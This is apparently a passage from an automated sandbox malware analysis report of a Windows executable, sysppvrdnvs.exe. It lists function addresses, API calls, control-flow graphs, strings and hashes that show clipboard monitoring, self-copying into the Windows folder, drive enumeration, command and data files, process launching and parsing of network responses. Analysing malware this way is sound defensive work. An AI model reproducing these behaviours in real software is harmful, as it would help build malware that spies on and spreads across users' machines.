                                                                                                                                                                                                      • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3549449529-0
                                                                                                                                                                                                      • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                                      • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69
                                                                                                                                                                                                      Function 00406F70 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106sleepthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000104), ref: 00406F90
                                                                                                                                                                                                        • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                                        • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                                        • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                                                                                        • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                                        • Part of subcall function 004063E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                                        • Part of subcall function 004063E0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                                        • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                                                                                        • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                                                                                      • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00407072
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00407092
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004070B5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                      • String ID: (%dGB)$%s%s$C:\Windows\sysppvrdnvs.exe$Unnamed volume
                                                                                                                                                                                                      • API String ID: 1650488544-747518629
                                                                                                                                                                                                      • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                                      • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
                                                                                                                                                                                                      Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 004058D8
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00405926
                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                      • String ID: %x%X$0
                                                                                                                                                                                                      • API String ID: 716646876-225668902
                                                                                                                                                                                                      • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                                      • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69
                                                                                                                                                                                                      Function 0040F240 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 264 40f240-40f27f CreateFileW 265 40f285-40f2a0 CreateFileMappingW 264->265 266 40f39a-40f39e 264->266 269 40f390-40f393 265->269 270 40f2a6-40f2bf MapViewOfFile 265->270 267 40f3a0-40f3c0 CreateFileW 266->267 268 40f3f4-40f3fa 266->268 273 40f3c2-40f3e1 WriteFile 267->273 274 40f3e8-40f3f1 call 40ab60 267->274 269->266 271 40f2c5-40f2db GetFileSize 270->271 272 40f386-40f389 270->272 275 40f2e1-40f2f4 call 40d1a0 271->275 276 40f37c-40f380 UnmapViewOfFile 271->276 272->269 273->274 274->268 275->276 281 40f2fa-40f309 275->281 276->272 281->276 282 40f30b-40f32b call 40cb40 281->282 284 40f330-40f33a 282->284 284->276 285 40f33c-40f367 call 40ae90 memcmp 284->285 285->276 288 40f369-40f375 call 40ab60 285->288 288->276
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                                                                                      • memcmp.NTDLL ref: 0040F35D
                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 3902698870-3424199868
                                                                                                                                                                                                      • Opcode ID: 7d502bbc833238380c95321b91a828a1a785b751e7efdeca87fc0906aa905e9c
                                                                                                                                                                                                      • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d502bbc833238380c95321b91a828a1a785b751e7efdeca87fc0906aa905e9c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98
                                                                                                                                                                                                      Function 0040BC70 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 309 40bc70-40bc88 InitializeCriticalSection 310 40bc93-40bc9a 309->310 311 40bcb9-40bcda CreateFileW 310->311 312 40bc9c-40bcaf call 40df20 call 40b850 310->312 314 40bce0-40bcfb CreateFileMappingW 311->314 315 40bda2-40bdc5 call 40b510 call 40dbe0 311->315 324 40bcb4-40bcb7 312->324 317 40bd01-40bd1a MapViewOfFile 314->317 318 40bd98-40bd9b 314->318 321 40bd1c-40bd39 GetFileSize 317->321 322 40bd8e-40bd91 317->322 318->315 325 40bd4d-40bd53 321->325 322->318 324->310 329 40bd84-40bd88 UnmapViewOfFile 325->329 330 40bd55-40bd5c 325->330 329->322 330->329 331 40bd5e-40bd82 call 40df20 call 40b850 330->331 331->325
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                                                                                      • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                                                                                        • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                        • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL ref: 0040DF38
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                      • String ID: C:\Users\user\tbtnds.dat$.Wu
                                                                                                                                                                                                      • API String ID: 439099756-3203353972
                                                                                                                                                                                                      • Opcode ID: af5c3b123f5e80eaa084090c55f6f129bab75b0b75ad2690ce5f7c53b1f27bcc
                                                                                                                                                                                                      • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: af5c3b123f5e80eaa084090c55f6f129bab75b0b75ad2690ce5f7c53b1f27bcc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
                                                                                                                                                                                                      Function 00405C00 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 337 405c00-405c32 InitializeCriticalSection CreateFileW 338 405d25-405d28 337->338 339 405c38-405c53 CreateFileMappingW 337->339 340 405c59-405c72 MapViewOfFile 339->340 341 405d1b-405d1e 339->341 342 405d11-405d14 340->342 343 405c78-405c8a GetFileSize 340->343 341->338 342->341 344 405c8d-405c91 343->344 345 405c93-405c9a 344->345 346 405d07-405d0b UnmapViewOfFile 344->346 347 405c9c 345->347 348 405c9e-405cb1 call 40d1d0 345->348 346->342 347->346 351 405cb3 348->351 352 405cb5-405cca 348->352 351->346 353 405cda-405d05 call 405d30 352->353 354 405ccc-405cd8 call 40ab60 352->354 353->344 354->346
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                                                                                      • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                      • String ID: C:\Users\user\tbtcmds.dat$.Wu
                                                                                                                                                                                                      • API String ID: 3956458805-382727166
                                                                                                                                                                                                      • Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                                      • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99
                                                                                                                                                                                                      Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 383 40dd50-40dd80 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 384 40dd86-40dd9a InterlockedExchangeAdd 383->384 385 40de69-40de80 GetCurrentThread SetThreadPriority 383->385 384->385 386 40dda0-40dda9 384->386 387 40ddac-40ddb3 386->387 387->385 388 40ddb9-40ddd4 EnterCriticalSection 387->388 389 40dddf-40dde7 388->389 390 40de27-40de3c LeaveCriticalSection 389->390 391 40dde9-40ddf6 389->391 394 40de47-40de4d 390->394 395 40de3e-40de45 390->395 392 40de03-40de25 WaitForSingleObject 391->392 393 40ddf8-40de01 391->393 396 40ddd6-40dddc 392->396 393->396 397 40de5c-40de64 Sleep 394->397 398 40de4f-40de58 394->398 395->385 396->389 397->387 398->397 399 40de5a 398->399 399->385
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                                                                                      • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02E70638,000000FF), ref: 0040DD5D
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                                                                                      • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02E70638,000000FF), ref: 0040DD6F
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                                                                                      • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3862671961-0
                                                                                                                                                                                                      • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                      • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99
                                                                                                                                                                                                      Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 400 40f400-40f460 memset * 2 CreateProcessW 401 40f471-40f495 ShellExecuteW 400->401 402 40f462-40f46f Sleep 400->402 404 40f4a6 401->404 405 40f497-40f4a4 Sleep 401->405 403 40f4a8-40f4ab 402->403 404->403 405->403
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 0040F40E
                                                                                                                                                                                                      • memset.NTDLL ref: 0040F41E
                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F467
                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                      • String ID: $D$open
                                                                                                                                                                                                      • API String ID: 3787208655-2182757814
                                                                                                                                                                                                      • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                                      • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759
                                                                                                                                                                                                      Function 0040B530 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 406 40b530-40b53d 407 40b544-40b562 call 40a950 406->407 408 40b53f 406->408 409 40b61c-40b61f 407->409 412 40b568-40b56f 407->412 408->409 413 40b57a-40b583 412->413 414 40b5b4-40b5d5 CreateFileW 413->414 415 40b585-40b5b2 413->415 417 40b603-40b619 InterlockedExchange call 40ab60 414->417 418 40b5d7-40b5fc WriteFile FlushFileBuffers 414->418 415->413 417->409 418->417
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
                                                                                                                                                                                                      • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                      • String ID: C:\Users\user\tbtnds.dat$.Wu
                                                                                                                                                                                                      • API String ID: 442028454-3203353972
                                                                                                                                                                                                      • Opcode ID: e97a8a2c87699ed7addb569746da41be2ee15c664e58c9574dad2c17ef3edcb8
                                                                                                                                                                                                      • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e97a8a2c87699ed7addb569746da41be2ee15c664e58c9574dad2c17ef3edcb8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                                                                                      Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 421 40e310-40e32a 422 40e33b-40e342 421->422 423 40e3f4-40e3fd 422->423 424 40e348-40e367 recvfrom 422->424 425 40e376-40e393 StrCmpNIA 424->425 426 40e369-40e374 Sleep 424->426 428 40e395-40e3b4 StrStrIA 425->428 429 40e3ef 425->429 427 40e32c-40e335 426->427 427->422 428->429 430 40e3b6-40e3ed StrChrA call 40d320 428->430 429->427 430->429
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                                      • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                                      • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                                      • StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
